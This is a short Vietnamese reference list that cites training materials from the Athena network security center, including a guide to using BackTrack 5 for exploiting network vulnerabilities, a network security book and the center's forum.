Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU HƯỚNG DẪN
VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ HỔNG MẠNG TẠI TRUNG TÂM
ATHENA”
Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng – Bí
quyết và giải pháp”
Diễn đàn của Athena